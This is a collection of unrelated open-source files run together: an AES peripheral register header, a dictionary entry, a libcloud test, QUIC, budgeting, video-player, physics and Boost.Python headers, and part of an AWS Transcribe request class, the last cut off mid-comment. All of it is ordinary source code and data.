any value can be written, including that of 0xE.Always reads as 0. */ /* -------- AES_IER : (AES Offset: 0x10) Interrupt Enable Register -------- */ #define AES_IER_DATRDY (0x1u << 0) /**< \brief (AES_IER) Data Ready Interrupt Enable */ #define AES_IER_URAD (0x1u << 8) /**< \brief (AES_IER) Unspecified Register Access Detection Interrupt Enable */ /* -------- AES_IDR : (AES Offset: 0x14) Interrupt Disable Register -------- */ #define AES_IDR_DATRDY (0x1u << 0) /**< \brief (AES_IDR) Data Ready Interrupt Disable */ #define AES_IDR_URAD (0x1u << 8) /**< \brief (AES_IDR) Unspecified Register Access Detection Interrupt Disable */ /* -------- AES_IMR : (AES Offset: 0x18) Interrupt Mask Register -------- */ #define AES_IMR_DATRDY (0x1u << 0) /**< \brief (AES_IMR) Data Ready Interrupt Mask */ #define AES_IMR_URAD (0x1u << 8) /**< \brief (AES_IMR) Unspecified Register Access Detection Interrupt Mask */ /* -------- AES_ISR : (AES Offset: 0x1C) Interrupt Status Register -------- */ #define AES_ISR_DATRDY (0x1u << 0) /**< \brief (AES_ISR) Data Ready */ #define AES_ISR_URAD (0x1u << 8) /**< \brief (AES_ISR) Unspecified Register Access Detection Status */ #define AES_ISR_URAT_Pos 12 #define AES_ISR_URAT_Msk (0xfu << AES_ISR_URAT_Pos) /**< \brief (AES_ISR) Unspecified Register Access: */ #define AES_ISR_URAT_IDR_WR_PROCESSING (0x0u << 12) /**< \brief (AES_ISR) Input Data Register written during the data processing when SMOD = 0x2 mode. */ #define AES_ISR_URAT_ODR_RD_PROCESSING (0x1u << 12) /**< \brief (AES_ISR) Output Data Register read during the data processing. */ #define AES_ISR_URAT_MR_WR_PROCESSING (0x2u << 12) /**< \brief (AES_ISR) Mode Register written during the data processing. */ #define AES_ISR_URAT_ODR_RD_SUBKGEN (0x3u << 12) /**< \brief (AES_ISR) Output Data Register read during the sub-keys generation. */ #define AES_ISR_URAT_MR_WR_SUBKGEN (0x4u << 12) /**< \brief (AES_ISR) Mode Register written during the sub-keys generation. */ #define AES_ISR_URAT_WOR_RD_ACCESS (0x5u << 12) /**< \brief (AES_ISR) Write-only register read access. */ #define AES_ISR_TAGRDY (0x1u << 16) /**< \brief (AES_ISR) GCM Tag Ready */ /* -------- AES_KEYWR[8] : (AES Offset: 0x20) Key Word Register -------- */ #define AES_KEYWR_KEYW_Pos 0 #define AES_KEYWR_KEYW_Msk (0xffffffffu << AES_KEYWR_KEYW_Pos) /**< \brief (AES_KEYWR[8]) Key Word */ #define AES_KEYWR_KEYW(value) ((AES_KEYWR_KEYW_Msk & ((value) << AES_KEYWR_KEYW_Pos))) /* -------- AES_IDATAR[4] : (AES Offset: 0x40) Input Data Register -------- */ #define AES_IDATAR_IDATA_Pos 0 #define AES_IDATAR_IDATA_Msk (0xffffffffu << AES_IDATAR_IDATA_Pos) /**< \brief (AES_IDATAR[4]) Input Data Word */ #define AES_IDATAR_IDATA(value) ((AES_IDATAR_IDATA_Msk & ((value) << AES_IDATAR_IDATA_Pos))) /* -------- AES_ODATAR[4] : (AES Offset: 0x50) Output Data Register -------- */ #define AES_ODATAR_ODATA_Pos 0 #define AES_ODATAR_ODATA_Msk (0xffffffffu << AES_ODATAR_ODATA_Pos) /**< \brief (AES_ODATAR[4]) Output Data */ /* -------- AES_IVR[4] : (AES Offset: 0x60) Initialization Vector Register -------- */ #define AES_IVR_IV_Pos 0 #define AES_IVR_IV_Msk (0xffffffffu << AES_IVR_IV_Pos) /**< \brief (AES_IVR[4]) Initialization Vector */ #define AES_IVR_IV(value) ((AES_IVR_IV_Msk & ((value) << AES_IVR_IV_Pos))) /* -------- AES_AADLENR : (AES Offset: 0x70) Additional Authenticated Data Length Register -------- */ #define AES_AADLENR_AADLEN_Pos 0 #define AES_AADLENR_AADLEN_Msk (0xffffffffu << AES_AADLENR_AADLEN_Pos) /**< \brief (AES_AADLENR) AAD Length */ #define AES_AADLENR_AADLEN(value) ((AES_AADLENR_AADLEN_Msk & ((value) << AES_AADLENR_AADLEN_Pos))) /* -------- AES_CLENR : (AES Offset: 0x74) Plaintext/Ciphertext Length Register -------- */ #define AES_CLENR_CLEN_Pos 0 #define AES_CLENR_CLEN_Msk (0xffffffffu << AES_CLENR_CLEN_Pos) /**< \brief (AES_CLENR) Plaintext/Ciphertext Length */ #define AES_CLENR_CLEN(value) ((AES_CLENR_CLEN_Msk & ((value) << AES_CLENR_CLEN_Pos))) /* -------- AES_GHASHR[4] : (AES Offset: 0x78) GCM Intermediate Hash Word Register -------- */ #define AES_GHASHR_GHASH_Pos 0 #define AES_GHASHR_GHASH_Msk (0xffffffffu << AES_GHASHR_GHASH_Pos) /**< \brief (AES_GHASHR[4]) Intermediate GCM Hash Word x */ #define AES_GHASHR_GHASH(value) ((AES_GHASHR_GHASH_Msk & ((value) << AES_GHASHR_GHASH_Pos))) /* -------- AES_TAGR[4] : (AES Offset: 0x88) GCM Authentication Tag Word Register -------- */ #define AES_TAGR_TAG_Pos 0 #define AES_TAGR_TAG_Msk (0xffffffffu << AES_TAGR_TAG_Pos) /**< \brief (AES_TAGR[4]) GCM Authentication Tag x */ /* -------- AES_CTRR : (AES Offset: 0x98) GCM Encryption Counter Value Register -------- */ #define AES_CTRR_CTR_Pos 0 #define AES_CTRR_CTR_Msk (0xffffffffu << AES_CTRR_CTR_Pos) /**< \brief (AES_CTRR) GCM Encryption Counter */ /* -------- AES_GCMHR[4] : (AES Offset: 0x9C) GCM H World Register -------- */ #define AES_GCMHR_H_Pos 0 #define AES_GCMHR_H_Msk (0xffffffffu << AES_GCMHR_H_Pos) /**< \brief (AES_GCMHR[4]) GCM H word x */ #define AES_GCMHR_H(value) ((AES_GCMHR_H_Msk & ((value) << AES_GCMHR_H_Pos))) /* -------- AES_VERSION : (AES Offset: 0xFC) Version Register -------- */ #define AES_VERSION_VERSION_Pos 0 #define AES_VERSION_VERSION_Msk (0xfffu << AES_VERSION_VERSION_Pos) /**< \brief (AES_VERSION) Version of the Hardware Module */ #define AES_VERSION_MFN_Pos 16 #define AES_VERSION_MFN_Msk (0x7u << AES_VERSION_MFN_Pos) /**< \brief (AES_VERSION) Metal Fix Number */ /*@}*/ #endif /* _SAM_AES_COMPONENT_ */
5,781
335
{ "word": "Grape", "definitions": [ "A berry (typically green, purple, or black) growing in clusters on a grapevine, eaten as fruit and used in making wine.", "Wine." ], "parts-of-speech": "Noun" }
93
1,435
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest import sys import mock from libcloud.common.base import LazyObject, Response from libcloud.common.exceptions import BaseHTTPError, RateLimitReachedError from libcloud.test import LibcloudTestCase class LazyObjectTest(LibcloudTestCase): class A(LazyObject): def __init__(self, x, y=None): self.x = x self.y = y def test_lazy_init(self): # Test normal init a = self.A(1, y=2) self.assertTrue(isinstance(a, self.A)) # Test lazy init with mock.patch.object(self.A, '__init__', return_value=None) as mock_init: a = self.A.lazy(3, y=4) self.assertTrue(isinstance(a, self.A)) # Proxy is a subclass of A mock_init.assert_not_called() # Since we have a mock init, an A object doesn't actually get # created. But, we can still call __dict__ on the proxy, which will # init the lazy object. self.assertEqual(a.__dict__, {}) mock_init.assert_called_once_with(3, y=4) def test_setattr(self): a = self.A.lazy('foo', y='bar') a.z = 'baz' wrapped_lazy_obj = object.__getattribute__(a, '_lazy_obj') self.assertEqual(a.z, 'baz') self.assertEqual(wrapped_lazy_obj.z, 'baz') class ErrorResponseTest(LibcloudTestCase): def mock_response(self, code, headers={}): m = mock.MagicMock() m.request = mock.Mock() m.headers = headers m.status_code = code m.text = None return m def test_rate_limit_response(self): resp_mock = self.mock_response(429, {'Retry-After': '120'}) try: Response(resp_mock, mock.MagicMock()) except RateLimitReachedError as e: self.assertEqual(e.retry_after, 120) except Exception: # We should have got a RateLimitReachedError self.fail("Catched exception should have been RateLimitReachedError") else: # We should have got an exception self.fail("HTTP Status 429 response didn't raised an exception") def test_error_with_retry_after(self): # 503 Service Unavailable may include Retry-After header resp_mock = self.mock_response(503, {'Retry-After': '300'}) try: Response(resp_mock, mock.MagicMock()) except BaseHTTPError as e: self.assertIn('retry-after', e.headers) self.assertEqual(e.headers['retry-after'], '300') else: # We should have got an exception self.fail("HTTP Status 503 response didn't raised an exception") @mock.patch('time.time', return_value=1231006505) def test_error_with_retry_after_http_date_format(self, time_mock): retry_after = 'Sat, 03 Jan 2009 18:20:05 -0000' # 503 Service Unavailable may include Retry-After header resp_mock = self.mock_response(503, {'Retry-After': retry_after}) try: Response(resp_mock, mock.MagicMock()) except BaseHTTPError as e: self.assertIn('retry-after', e.headers) # HTTP-date got translated to delay-secs self.assertEqual(e.headers['retry-after'], '300') else: # We should have got an exception self.fail("HTTP Status 503 response didn't raised an exception") if __name__ == '__main__': sys.exit(unittest.main())
1,751
1,351
<reponame>cmcfarlen/trafficserver /** @file A brief file description @section license License Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #pragma once #include "tscore/ink_platform.h" #include "P_Connection.h" #include "P_NetAccept.h" #include "quic/QUICTypes.h" #include "quic/QUICConnectionTable.h" #include "quic/QUICResetTokenTable.h" class QUICClosedConCollector; class QUICNetVConnection; class QUICPacket; class QUICPacketHeaderProtector; class QUICPacketHandler { public: QUICPacketHandler(QUICResetTokenTable &rtable); ~QUICPacketHandler(); void send_packet(const QUICPacket &packet, QUICNetVConnection *vc, const QUICPacketHeaderProtector &pn_protector); void send_packet(QUICNetVConnection *vc, const Ptr<IOBufferBlock> &udp_payload); void close_connection(QUICNetVConnection *conn); protected: void _send_packet(const QUICPacket &packet, UDPConnection *udp_con, IpEndpoint &addr, uint32_t pmtu, const QUICPacketHeaderProtector *ph_protector, int dcil); void _send_packet(UDPConnection *udp_con, IpEndpoint &addr, Ptr<IOBufferBlock> udp_payload); QUICConnection *_check_stateless_reset(const uint8_t *buf, size_t buf_len); // FIXME Remove this // QUICPacketHandler could be a continuation, but NetAccept is a continuation too. virtual Continuation *_get_continuation() = 0; Event *_collector_event = nullptr; QUICClosedConCollector *_closed_con_collector = nullptr; virtual void _recv_packet(int event, UDPPacket *udpPacket) = 0; QUICResetTokenTable &_rtable; }; /* * @class QUICPacketHandlerIn * @brief QUIC Packet Handler for incoming connections */ class QUICPacketHandlerIn : public NetAccept, public QUICPacketHandler { public: QUICPacketHandlerIn(const NetProcessor::AcceptOptions &opt, QUICConnectionTable &ctable, QUICResetTokenTable &rtable); ~QUICPacketHandlerIn(); // NetAccept virtual NetProcessor *getNetProcessor() const override; virtual NetAccept *clone() const override; virtual int acceptEvent(int event, void *e) override; void init_accept(EThread *t) override; protected: // QUICPacketHandler Continuation *_get_continuation() override; private: void _recv_packet(int event, UDPPacket *udp_packet) override; int _stateless_retry(const uint8_t *buf, uint64_t buf_len, UDPConnection *connection, IpEndpoint from, QUICConnectionId dcid, QUICConnectionId scid, QUICConnectionId *original_cid, QUICConnectionId *retry_cid, QUICVersion version); bool _send_stateless_reset(QUICConnectionId dcid, uint32_t instance_id, UDPConnection *udp_con, IpEndpoint &addr, size_t maximum_size); void _send_invalid_token_error(const uint8_t *initial_packet, uint64_t initial_packet_len, UDPConnection *connection, IpEndpoint from); QUICConnectionTable &_ctable; }; /* * @class QUICPacketHandlerOut * @brief QUIC Packet Handler for outgoing connections */ class QUICPacketHandlerOut : public Continuation, public QUICPacketHandler { public: QUICPacketHandlerOut(QUICResetTokenTable &rtable); ~QUICPacketHandlerOut(){}; void init(QUICNetVConnection *vc); int event_handler(int event, Event *data); protected: // QUICPacketHandler Continuation *_get_continuation() override; private: void _recv_packet(int event, UDPPacket *udp_packet) override; QUICNetVConnection *_vc = nullptr; };
1,417
1,224
<reponame>edwardtheharris/fava """Parsing and computing budgets.""" import datetime from collections import Counter from collections import defaultdict from typing import Dict from typing import List from typing import NamedTuple from typing import Tuple from typing import TYPE_CHECKING from beancount.core.data import Custom from beancount.core.number import Decimal from fava.core.module_base import FavaModule from fava.helpers import BeancountError from fava.util.date import days_in_daterange from fava.util.date import Interval from fava.util.date import number_of_days_in_period if TYPE_CHECKING: # pragma: no cover from fava.core import FavaLedger class Budget(NamedTuple): """A budget entry.""" account: str date_start: datetime.date period: Interval number: Decimal currency: str BudgetDict = Dict[str, List[Budget]] class BudgetError(BeancountError): """Error with a budget.""" class BudgetModule(FavaModule): """Parses budget entries.""" def __init__(self, ledger: "FavaLedger") -> None: super().__init__(ledger) self.budget_entries: BudgetDict = {} def load_file(self) -> None: self.budget_entries, errors = parse_budgets( self.ledger.all_entries_by_type.Custom ) self.ledger.errors.extend(errors) def calculate( self, account: str, begin_date: datetime.date, end_date: datetime.date, ) -> Dict[str, Decimal]: """Calculate the budget for an account in an interval.""" return calculate_budget( self.budget_entries, account, begin_date, end_date ) def calculate_children( self, account: str, begin_date: datetime.date, end_date: datetime.date, ) -> Dict[str, Decimal]: """Calculate the budget for an account including its children.""" return calculate_budget_children( self.budget_entries, account, begin_date, end_date ) def __bool__(self) -> bool: return bool(self.budget_entries) def parse_budgets( custom_entries: List[Custom], ) -> Tuple[BudgetDict, List[BudgetError]]: """Parse budget directives from custom entries. Args: custom_entries: the Custom entries to parse budgets from. Returns: A dict of accounts to lists of budgets. Example: 2015-04-09 custom "budget" Expenses:Books "monthly" 20.00 EUR """ budgets: BudgetDict = defaultdict(list) errors = [] interval_map = { "daily": Interval.DAY, "weekly": Interval.WEEK, "monthly": Interval.MONTH, "quarterly": Interval.QUARTER, "yearly": Interval.YEAR, } for entry in (entry for entry in custom_entries if entry.type == "budget"): try: interval = interval_map.get(str(entry.values[1].value)) if not interval: errors.append( BudgetError( entry.meta, "Invalid interval for budget entry", entry, ) ) continue budget = Budget( entry.values[0].value, entry.date, interval, entry.values[2].value.number, entry.values[2].value.currency, ) budgets[budget.account].append(budget) except (IndexError, TypeError): errors.append( BudgetError(entry.meta, "Failed to parse budget entry", entry) ) return budgets, errors def _matching_budgets( budgets: BudgetDict, accounts: str, date_active: datetime.date ) -> Dict[str, Budget]: """Find matching budgets. Returns: The budget that is active on the specified date for the specified account. """ last_seen_budgets = {} for budget in budgets[accounts]: if budget.date_start <= date_active: last_seen_budgets[budget.currency] = budget else: break return last_seen_budgets def calculate_budget( budgets: BudgetDict, account: str, date_from: datetime.date, date_to: datetime.date, ) -> Dict[str, Decimal]: """Calculate budget for an account. Args: budgets: A list of :class:`Budget` entries. account: An account name. date_from: Starting date. date_to: End date (exclusive). Returns: A dictionary of currency to Decimal with the budget for the specified account and period. """ if account not in budgets: return {} currency_dict: Dict[str, Decimal] = defaultdict(Decimal) for single_day in days_in_daterange(date_from, date_to): matches = _matching_budgets(budgets, account, single_day) for budget in matches.values(): currency_dict[ budget.currency ] += budget.number / number_of_days_in_period( budget.period, single_day ) return currency_dict def calculate_budget_children( budgets: BudgetDict, account: str, date_from: datetime.date, date_to: datetime.date, ) -> Dict[str, Decimal]: """Calculate budget for an account including budgets of its children. Args: budgets: A list of :class:`Budget` entries. account: An account name. date_from: Starting date. date_to: End date (exclusive). Returns: A dictionary of currency to Decimal with the budget for the specified account and period. """ currency_dict: Dict[str, Decimal] = Counter() # type: ignore for child in budgets.keys(): if child.startswith(account): currency_dict.update( calculate_budget(budgets, child, date_from, date_to) ) return currency_dict
2,524
3,097
<filename>Wuxianda/Classes/Src/Video/Controllers/YPMoviePlayerViewController.h // // YPMoviePlayerViewController.h // Wuxianda // // Created by 胡云鹏 on 16/5/15. // Copyright © 2016年 michaelhuyp. All rights reserved. // 视频播放器 #import <UIKit/UIKit.h> #import <IJKMediaFramework/IJKMediaFramework.h> @interface YPMoviePlayerViewController : UIViewController + (void)presentFromViewController:(UIViewController *)viewController URL:(NSURL *)url animated:(BOOL)animated; @end
187
852
<gh_stars>100-1000 #ifndef TrackAssociator_FiducialVolume_h #define TrackAssociator_FiducialVolume_h 1 // -*- C++ -*- // // Package: TrackAssociator // Class: FiducialVolume // /* Description: detector active volume described by a closed cylinder with non-zero thickness. */ // // Original Author: <NAME> // /// The detector active volume is determined estimated as a non-zero thickness /// cylinder with outter dimensions maxZ and maxR. The inner dimensions are /// found as minimum R and Z for two cases "barrel" (|eta|<1) and /// "endcap" (|eta|>1.7) correspondingly #include "DataFormats/GeometryVector/interface/GlobalPoint.h" #include <vector> class FiducialVolume { public: FiducialVolume(double tolerance = 1.0) : tolerance_(tolerance) { reset(); } /// finilize dimension calculations, fixes dimensions in a /// case of missing barrel or endcap void determinInnerDimensions(); /// check whether the volume is properly defined bool isValid() const; /// add a point that belongs to the active volume void addActivePoint(const GlobalPoint& point); /// invalidate the volume void reset(); double minR(bool withTolerance = true) const { if (withTolerance && minR_ > tolerance_) return minR_ - tolerance_; else return minR_; } double maxR(bool withTolerance = true) const { if (withTolerance) return maxR_ + tolerance_; else return maxR_; } double minZ(bool withTolerance = true) const { if (withTolerance && minZ_ > tolerance_) return minZ_ - tolerance_; else return minZ_; } double maxZ(bool withTolerance = true) const { if (withTolerance) return maxZ_ + tolerance_; else return maxZ_; } private: double minR_; double maxR_; double minZ_; double maxZ_; double tolerance_; }; #endif
628
8,805
// Copyright <NAME> 2002. // Distributed under the Boost Software License, Version 1.0. (See // accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) #ifndef OPERATOR_ID_DWA2002531_HPP # define OPERATOR_ID_DWA2002531_HPP namespace boost { namespace python { namespace detail { enum operator_id { op_add, op_sub, op_mul, op_div, op_mod, op_divmod, op_pow, op_lshift, op_rshift, op_and, op_xor, op_or, op_neg, op_pos, op_abs, op_invert, op_int, op_long, op_float, op_str, op_cmp, op_gt, op_ge, op_lt, op_le, op_eq, op_ne, op_iadd, op_isub, op_imul, op_idiv, op_imod, op_ilshift, op_irshift, op_iand, op_ixor, op_ior, op_complex, #if PY_VERSION_HEX >= 0x03000000 op_bool, #else op_nonzero, #endif op_repr #if PY_VERSION_HEX >= 0x03000000 ,op_truediv #endif }; }}} // namespace boost::python::detail #endif // OPERATOR_ID_DWA2002531_HPP
620
3,372
<filename>aws-java-sdk-transcribe/src/main/java/com/amazonaws/services/transcribe/model/CreateVocabularyFilterRequest.java /* * Copyright 2016-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.transcribe.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.AmazonWebServiceRequest; /** * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/transcribe-2017-10-26/CreateVocabularyFilter" target="_top">AWS * API Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class CreateVocabularyFilterRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable { /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> */ private String vocabularyFilterName; /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> */ private String languageCode; /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> */ private java.util.List<String> words; /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you can't * use the <code>Words</code> parameter. * </p> */ private String vocabularyFilterFileUri; /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> */ private java.util.List<Tag> tags; /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> * * @param vocabularyFilterName * The vocabulary filter name. The name must be unique within the account that contains it. If you try to * create a vocabulary filter with the same name as another vocabulary filter, you get a * <code>ConflictException</code> error. */ public void setVocabularyFilterName(String vocabularyFilterName) { this.vocabularyFilterName = vocabularyFilterName; } /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> * * @return The vocabulary filter name. The name must be unique within the account that contains it. If you try to * create a vocabulary filter with the same name as another vocabulary filter, you get a * <code>ConflictException</code> error. */ public String getVocabularyFilterName() { return this.vocabularyFilterName; } /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> * * @param vocabularyFilterName * The vocabulary filter name. The name must be unique within the account that contains it. If you try to * create a vocabulary filter with the same name as another vocabulary filter, you get a * <code>ConflictException</code> error. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withVocabularyFilterName(String vocabularyFilterName) { setVocabularyFilterName(vocabularyFilterName); return this; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @param languageCode * The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @see LanguageCode */ public void setLanguageCode(String languageCode) { this.languageCode = languageCode; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @return The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @see LanguageCode */ public String getLanguageCode() { return this.languageCode; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @param languageCode * The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @return Returns a reference to this object so that method calls can be chained together. * @see LanguageCode */ public CreateVocabularyFilterRequest withLanguageCode(String languageCode) { setLanguageCode(languageCode); return this; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @param languageCode * The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @return Returns a reference to this object so that method calls can be chained together. * @see LanguageCode */ public CreateVocabularyFilterRequest withLanguageCode(LanguageCode languageCode) { this.languageCode = languageCode.toString(); return this; } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * * @return The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. */ public java.util.List<String> getWords() { return words; } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * * @param words * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. */ public void setWords(java.util.Collection<String> words) { if (words == null) { this.words = null; return; } this.words = new java.util.ArrayList<String>(words); } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * <p> * <b>NOTE:</b> This method appends the values to the existing list (if any). Use * {@link #setWords(java.util.Collection)} or {@link #withWords(java.util.Collection)} if you want to override the * existing values. * </p> * * @param words * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withWords(String... words) { if (this.words == null) { setWords(new java.util.ArrayList<String>(words.length)); } for (String ele : words) { this.words.add(ele); } return this; } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * * @param words * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withWords(java.util.Collection<String> words) { setWords(words); return this; } /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you can't * use the <code>Words</code> parameter. * </p> * * @param vocabularyFilterFileUri * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters * from the character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you * can't use the <code>Words</code> parameter. */ public void setVocabularyFilterFileUri(String vocabularyFilterFileUri) { this.vocabularyFilterFileUri = vocabularyFilterFileUri; } /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you can't * use the <code>Words</code> parameter. * </p> * * @return The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters * from the character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you * can't use the <code>Words</code> parameter. */ public String getVocabularyFilterFileUri() { return this.vocabularyFilterFileUri; } /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> 